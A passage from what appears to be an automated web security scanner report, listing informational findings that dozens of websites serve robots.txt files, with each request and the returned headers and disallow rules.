User-Agent: *
Allow: /

30.274. http://www.libertytax.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.libertytax.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.libertytax.com

Response

HTTP/1.1 200 OK
Content-Length: 1691
Content-Type: text/plain
Content-Location: http://www.libertytax.com/robots.txt
Last-Modified: Thu, 17 Feb 2011 16:48:59 GMT
Accept-Ranges: bytes
ETag: "ba222293c2cecb1:67e1"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:57:12 GMT
Connection: close

User-agent: *
User-Agent: Googlebot
User-Agent: bingbot
User-agent: Googlebot-Mobile
User-agent: MSMOBOT

Disallow: /App_Code/
Disallow: /App_WebReferences/
Disallow: /AssetManagement/
Disall
...[SNIP]...

30.275. http://www.livedash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livedash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livedash.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:05:47 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 02 Mar 2011 06:46:40 GMT
ETag: "5d1107d-e6-49d7a466d9400"
Accept-Ranges: bytes
Content-Length: 230
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /smarty/
Disallow: /_inc/
Disallow: /_css/
Disallow: /js/
Disallow: /simile/
Disallow: /simplehtmldom/
Allow: /
Disallow: /templates/
Disallow: /include/
Disallow: /c
...[SNIP]...

30.276. http://www.livingonadime.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.livingonadime.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.livingonadime.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:16:44 GMT
Server: Apache
Last-Modified: Fri, 15 Apr 2011 22:18:05 GMT
Accept-Ranges: bytes
Content-Length: 94
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /ebooks/
Disallow: /_private/
Disallow: /cgi-bin/
Disallow: /scripts/

30.277. http://www.ljseek.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ljseek.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ljseek.com

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 00:46:08 GMT
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 16 Feb 2010 12:52:50 GMT
ETag: "2a47b3-97-47fb736160c80"
Accept-Ranges: bytes
Content-Length: 151
Vary: Accept-Encoding
Content-Type: text/plain; charset=UTF-8
Connection: close

User-agent: *

Disallow: /bookmark.php
Disallow: /amazon.php
Disallow: /clickad.php
Disallow: /clickme.php
Disallow: /url.php
Disallow: /getimage.php


30.278. http://www.llewellyn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.llewellyn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.llewellyn.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:27:58 GMT
Server: Apache/2.2.0 (Fedora)
Last-Modified: Fri, 02 Oct 2009 21:02:01 GMT
ETag: "22e897-99-474fa13486440"
Accept-Ranges: bytes
Content-Length: 153
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_theme/
Disallow: /cart.php
Disallow: /blocks/
Disallow: /cgi-bin/
Disallow: /includes/

User-agent: Googlebot-Image
Disallow: /

30.279. http://www.localedge.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localedge.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localedge.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:23 GMT
Server: Oracle-Application-Server-10g/10.1.2.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 29 Feb 2008 17:05:38 GMT
ETag: "ac018-38-47c83b62"
Accept-Ranges: bytes
Content-Length: 56
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /portals/*?id*
Disallow: /*?id


30.280. http://www.localism.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localism.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localism.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:35:51 GMT
Server: Apache/2.2.3 (Red Hat) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
Last-Modified: Thu, 10 Mar 2011 17:01:07 GMT
ETag: "14c825c-cc-49e23ca9a5ac0"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

30.281. http://www.localtvllc.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.localtvllc.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.localtvllc.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:47:59 GMT
Server: Apache
X-Pingback: http://www.localtvllc.com/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

30.282. http://www.longislandexchange.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.longislandexchange.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.longislandexchange.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:20:24 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 07 Mar 2011 18:07:17 GMT
ETag: "5c58a5c-e9-49de85db59f40"
Accept-Ranges: bytes
Content-Length: 233
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /guestbook/
Disallow: /icon/
Disallow: /profiles/*/guestbook/
Disallow: /profiles/*?
Disallow: /profiles/*.php$
Disallow: /press/wp-content/uploads/2009/06/air-students.jpg

#
...[SNIP]...

30.283. http://www.looktothestars.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.looktothestars.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.looktothestars.org

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:28:14 GMT
Server: nginx/0.8.54
Content-Type: text/plain
Status: 200 OK
Last-Modified: Tue, 19 Apr 2011 07:18:42 GMT
Content-Length: 101
X-Varnish: 143993793 143993400
Age: 79
Via: 1.1 varnish
X-Cache: HIT
Vary: Accept-Encoding
Connection: close

Sitemap: http://www.looktothestars.org/google_sitemap

User-agent: Googlebot
Disallow: /*/rss20.xml$

30.284. http://www.lowerhealthquotes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowerhealthquotes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowerhealthquotes.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:46:36 GMT
Server: Apache/2.2.16 (Debian)
Last-Modified: Thu, 31 Mar 2011 13:37:07 GMT
ETag: "10241d0-cc-49fc763b5a6c0"
Accept-Ranges: bytes
Content-Length: 204
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain
Set-Cookie: WILDCAT_SERVER=3; path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
#
# To ban all spiders from the entire site uncomment the next two lines:
# User-Agent: *
# Disallow
...[SNIP]...

30.285. http://www.lowerpressure.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lowerpressure.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowerpressure.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:44:00 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=t56ek29ikpdfbr1l0tioi58at5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/
X-Pingback: http://www.lowerpressure.com/xmlrpc.php
Content-Length: 78
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.lowerpressure.com/sitemap.xml.gz

30.286. http://www.lsureveille.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lsureveille.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lsureveille.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:39:20 GMT
Server: Apache
ETag: W/"26-1294349890000"
Last-Modified: Thu, 06 Jan 2011 21:38:10 GMT
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.287. http://www.lttmlistings.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lttmlistings.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lttmlistings.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:47:33 GMT
Server: Apache-Coyote/1.1
Accept-Ranges: bytes
ETag: W/"26-1255843419000"
Last-Modified: Sun, 18 Oct 2009 05:23:39 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 26
Connection: close
X-Pad: avoid browser bug

User-agent: *
Disallow: /

30.288. http://www.luckyasiangirls.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.luckyasiangirls.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.luckyasiangirls.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:10:39 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://luckyasiangirls.com/xmlrpc.php
Rating: RTA-5042-1996-1400-1577-RTA
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://luckyasiangirls.com/sitemap.xml

30.289. http://www.lyred.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lyred.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lyred.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:49:29 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 21 Sep 2006 09:51:07 GMT
ETag: "50f039b-17-41df3a9a0f8c0"
Accept-Ranges: bytes
Content-Length: 23
Cache-Control: max-age=3600
Expires: Mon, 02 May 2011 00:49:29 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

30.290. http://www.mangastream.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mangastream.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mangastream.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1247612640"
Last-Modified: Sun, 20 Feb 2011 01:48:24 GMT
Content-Length: 63
Connection: close
Date: Mon, 02 May 2011 00:33:17 GMT
Server: lighttpd/1.4.28

User-agent: *
Allow: /

User-agent: ia_archiver
Disallow: /

30.291. http://www.map24.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.map24.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.map24.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:22:32 GMT
Server: Apache/2.2.4 (Unix) mod_ssl/2.2.4 OpenSSL/0.9.8e PHP/5.2.3
Last-Modified: Fri, 18 Jul 2008 12:47:36 GMT
ETag: "661e8e-95-c3180a00"
Accept-Ranges: bytes
Content-Length: 149
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# robots.txt for http://www.map24.com/
User-agent: *
Disallow: /res/
Disallow: /geoip/
Disallow: /nusoap/
Disallow: /classes/
Disallow: /css/

30.292. http://www.mappy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mappy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mappy.com

Response

HTTP/1.1 200 OK
Expires: Mon, 16 May 2011 00:45:25 GMT
Vary: Accept-Encoding,User-Agent
Vary: Accept-Encoding
Accept-Ranges: bytes
Cache-Control: max-age=1209600
Content-Length: 1697
Date: Mon, 02 May 2011 00:45:25 GMT
Connection: close
Last-Modified: Wed, 04 Nov 2009 14:57:07 GMT
Server: Apache
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.293. http://www.marketintellisearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marketintellisearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marketintellisearch.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:42:50 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 15:08:22 GMT
ETag: "c46a6-10d-4a02d3f406580"
Accept-Ranges: bytes
Content-Length: 269
Connection: close
Content-Type: text/plain

User-agent: *
User-agent: Mediapartners-Google
User-agent: Googlebot
User-agent: Googlebot-news
sitemap:http://www.marketintellisearch.com/sitemap.xml
Allow: /
Allow: /articles
Disallow: /amstock
Disa
...[SNIP]...

30.294. http://www.marrow.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marrow.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.marrow.org

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:11:34 GMT
Server: Apache
Last-Modified: Fri, 08 Apr 2011 15:38:55 GMT
ETag: "e053-11c-4d9f2c0f"
Accept-Ranges: bytes
Content-Length: 284
Connection: close
Content-Type: text/plain

# robots.txt file for www.marrow.org

User-agent:*
Disallow: /panels/

# block google from indexing images

User-agent: Googlebot-Image
Disallow: /

# block yahoo from our images directory

...[SNIP]...

30.295. http://www.mdconsult.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mdconsult.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mdconsult.com

Response

HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Mon, 02 May 2011 00:11:15 GMT
P3P: CP="ALL CURa DEVa TAIa OUR IND PHY ONL UNI PUR DEM STA"
Content-type: text/plain
Last-modified: Wed, 11 Aug 2010 13:41:33 GMT
Content-length: 19284
Accept-ranges: bytes
Connection: close

# robots.txt for http://www.mdconsult.com/
# SCCS Info: robots.txt %Z% %P% %I% %E%

Sitemap: http://www.mdconsult.com/sitemap.xml

User-agent: *
Disallow: /

User-agent: scirus-webcrawler
Use
...[SNIP]...

30.296. http://www.megajackpot4life.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.megajackpot4life.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.megajackpot4life.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 18 Nov 2010 15:37:48 GMT
Accept-Ranges: bytes
ETag: "505b788d3687cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:16:09 GMT
Connection: close
Content-Length: 253

###############################
#
#
User-agent: *
#
# list folders robots are not allowed to index
#
Disallow: /
#
# list specific files robots are not allowed to index
#
#Disallow: /direc
...[SNIP]...

30.297. http://www.mental-health-matters.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mental-health-matters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mental-health-matters.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:33:12 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 19 Apr 2011 12:10:48 GMT
ETag: "1c70001-12f-4a14466008200"
Accept-Ranges: bytes
Content-Length: 303
Cache-Control: max-age=0
Expires: Mon, 02 May 2011 00:33:12 GMT
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.298. http://www.mexconnect.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mexconnect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mexconnect.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:14:16 GMT
Status: 200 OK
Last-Modified: Wed, 25 Nov 2009 01:09:24 GMT
Content-Type: text/plain
Content-Length: 23
Cache-Control: max-age=60
Expires: Mon, 02 May 2011 00:15:16 GMT
Connection: close

User-agent: *
Allow: /

30.299. http://www.michiganmessenger.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.michiganmessenger.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.michiganmessenger.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:29:40 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 17:07:08 GMT
ETag: "1b70e4c-271-4a170c5748700"
Accept-Ranges: bytes
Content-Length: 625
Connection: close
Content-Type: text/plain

# Google Image
User-agent: Googlebot-Image
Disallow:
Allow: /*

# Google AdSense
User-agent: Mediapartners-Google*
Disallow:
Allow: /*

# digg mirror
User-agent: duggmirror
Disallow: /

User-agent: *

...[SNIP]...

30.300. http://www.microchip.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microchip.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.microchip.com

Response

HTTP/1.0 200 OK
Content-Length: 397
Content-Type: text/plain
Content-Location: http://www.microchip.com/robots.txt
Last-Modified: Fri, 13 Nov 2009 20:05:21 GMT
Accept-Ranges: bytes
ETag: "c5711da19c64ca1:9375"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:25:14 GMT
Connection: close

User-agent: Baiduspider
Disallow:
Crawl-delay: 120
User-agent: Googlebot
Disallow:
Crawl-delay: 120
User-agent: Slurp
Disallow:
Crawl-delay: 120
User-agent: YahooSeeker
Disallow:
Crawl-
...[SNIP]...

30.301. http://www.mihomepaper.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mihomepaper.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mihomepaper.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:38:15 GMT
Server: Apache
Last-Modified: Mon, 09 Aug 2010 15:28:11 GMT
ETag: "f00000017dd5b-9e2-48d65aa12bbc7"
Accept-Ranges: bytes
Content-Length: 2530
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

30.302. http://www.milwaukee.gov/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.milwaukee.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.milwaukee.gov

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 15 Apr 2010 20:29:04 GMT
Accept-Ranges: bytes
ETag: "0683d4adadcca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:48:24 GMT
Connection: close
Content-Length: 81

User-agent: *
Disallow: /display/components/Blocks
Disallow: /*?*PrintPage=yes*

30.303. http://www.moroccanoil.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.moroccanoil.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.moroccanoil.com

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:21:53 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 13 Apr 2011 14:52:34 GMT
ETag: "300003e7-130-4a0cdf57a1080"
Accept-Ranges: bytes
Content-Length: 304
Connection: close
Content-Type: text/plain
X-Pad: avoid browser bug

User-agent: *
Disallow: /administrator/
Disallow: /cache/
Disallow: /components/
Disallow: /images/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /libraries/
Disallow: /
...[SNIP]...

30.304. http://www.mrsdash.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mrsdash.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mrsdash.com

Response

HTTP/1.1 200 OK
Content-Length: 145
Content-Type: text/plain
Content-Location: http://www.mrsdash.com/robots.txt
Last-Modified: Fri, 15 Apr 2011 16:31:20 GMT
Accept-Ranges: bytes
ETag: "07c28d8afbcb1:261"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:08:51 GMT
Connection: close

User-agent: *
Disallow: /print/*
Disallow: *?scid*
Disallow: *?cfid*
Disallow: /user-reviews/*

Sitemap: http://www.mrsdash.com/sitemap.xml

30.305. http://www.mst.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mst.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mst.edu

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:30:44 GMT
Server: Apache/2.2.17 (Fedora)
Vary: Host
Last-Modified: Thu, 10 Jan 2008 19:47:48 GMT
ETag: "365ce-6b-443637bff6100"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain; charset=UTF-8

# go away
User-agent: *
Disallow: /local_config/
Disallow: /Site_config/
Disallow: /Content_Repository/

30.306. http://www.mumsnet.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mumsnet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mumsnet.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:53:19 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8b PHP/5.2.11 Resin/3.1.3
Last-Modified: Fri, 24 Dec 2010 02:48:41 GMT
ETag: "23a802b-1b1-4981f061fd440"
Accept-Ranges: bytes
Content-Length: 433
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /test/
Disallow: /Pub?call=com.mumsnet.surveys
Disallow: /stats/
Disallow: /discounts
Disallow: /lw/state.html
Disallow: /ginaford
Disallow: /ReportTalkPost
Disallow: /InTouch

...[SNIP]...

30.307. http://www.muschealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.muschealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.muschealth.com

Response

HTTP/1.1 200 OK
Content-Length: 1499
Content-Type: text/plain
Server: Microsoft-IIS/7.0
Set-Cookie: CFID=49938954;expires=Wed, 24-Apr-2041 00:39:42 GMT;path=/
Set-Cookie: CFTOKEN=9eedac82dd664577-AE25793A-23AE-EC0F-20000B8A6D7D4EE6;expires=Wed, 24-Apr-2041 00:39:42 GMT;path=/
Set-Cookie: SESESSIONID=D028C80F2427DFF2341960D8A44F52F2;path=/
Set-Cookie: SESESSIONCODE=ED78F37371089A8F4EF150A15EBDFD48;path=/
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:39:41 GMT
Connection: keep-alive
Set-Cookie: NSC_tjuffyfd-fyu=ffffffff831fd44345525d5f4f58455e445a4a423660;expires=Mon, 02-May-2011 15:39:41 GMT;path=/

# robots.txt for http://www.muschealth.com/
# Last mod: 2009/11/11 10:19 AM


User-agent: *
Disallow: /gs/UserControls/
Disallow: /cds/UserControls/
Disallow: /ActiveCalendar
Disallow: /Active
...[SNIP]...

30.308. http://www.museum.tv/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.museum.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.museum.tv

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 00:44:17 GMT
Server: Apache/2.0.52 (CentOS)
Last-Modified: Wed, 06 Apr 2011 11:08:42 GMT
ETag: "d290828-7c-3fa6280"
Accept-Ranges: bytes
Content-Length: 124
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

30.309. http://www.musicoutfitters.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.musicoutfitters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.musicoutfitters.com

Response

HTTP/1.1 200 OK
Date: Sun, 01 May 2011 23:35:46 GMT
Content-Type: text/plain
Connection: close
Server: Apache/Nginx/Varnish
Last-Modified: Fri, 26 Dec 2008 20:29:48 GMT
ETag: "13e481a-121-45ef8fc8dc79c"
Accept-Ranges: bytes
Cache-Control: max-age=14400, public
Expires: Mon, 02 May 2011 03:35:46 GMT
Content-Length: 289
Age: 0

User-Agent: FDSE
Disallow: /images/
Disallow: /cgi-bin/
Disallow: /cgibin/
Disallow: /artists/songs/
Disallow: /artists/images/
Disallow: /_private/
Disallow: /_vti_bin/
Disallow: /_vti_cnf/
Disallow:
...[SNIP]...

30.310. http://www.myfoxboston.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfoxboston.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfoxboston.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Mon, 02 May 2011 00:03:27 GMT
ETag: "59004a-b7-4a23fc0bb91c0"
Content-Type: text/plain
Date: Mon, 02 May 2011 00:44:06 GMT
Content-Length: 183
Connection: close

User-agent: *
Sitemap: http://www.myfoxboston.com/sitemap_myfoxboston.xml
Sitemap: http://www.myfoxboston.com/feedServlet?obfType=GOOGLE_NEWS_SITEMAPS&siteId=1006
Disallow: /search

30.311. http://www.myfoxchicago.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.myfoxchicago.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.myfoxchicago.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.13 (Unix)
Last-Modified: Sun, 01 May 2011 00:00:49 GMT
ETag: "8c0165-ba-4a22b99794e40"
Content-Type: text/plain
Date: Sun, 01 May 2011 23:03:49 GMT
Content-Length: 186
Connection: close

User-agent: *
Sitemap: http://www.myfoxchicago.com/sitemap_myfoxchicago.xml
Sitemap: http://www.myfoxchicago.com/feedServlet?obfType=GOOGLE_NEWS_SITEMAPS&siteId=1010
Disallow: /search

30.312. http://www.mylearningplan.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mylearningplan.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.mylearningplan.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Apr 2008 19:45:08 GMT
Accept-Ranges: bytes
ETag: "03ad0887aa5c81:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 02 May 2011 00:53:09 GMT
Connection: close
Content-Length: 479

User-agent: *
Disallow: /DistrictAdmin/
Disallow: /Docs/
Disallow: /BB/
Disallow: /CCTest/
Disallow: /EMail/
Disallow: /HowTo/
Disallow: /Help/
Disallow: /images/
Disallow: /include/
Disallo
...[SNIP]...

30.313. http://www.mylovedpee.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
